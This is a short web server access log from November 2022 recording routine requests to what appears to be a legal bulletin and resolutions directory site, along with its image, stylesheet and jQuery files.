172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
157.55.39.190 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.162 - - [07/Nov/2022:20:50:45 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.162 - - [07/Nov/2022:20:50:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 458531
172.22.2.4 - - [07/Nov/2022:20:49:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:20:51:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
179.33.241.34 - - [07/Nov/2022:20:51:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 884169
172.22.2.4 - - [07/Nov/2022:20:50:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
190.131.217.171 - - [07/Nov/2022:20:53:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.131.217.171 - - [07/Nov/2022:20:53:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.131.217.171 - - [07/Nov/2022:20:53:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.131.217.171 - - [07/Nov/2022:20:53:15 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.131.217.171 - - [07/Nov/2022:20:53:15 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
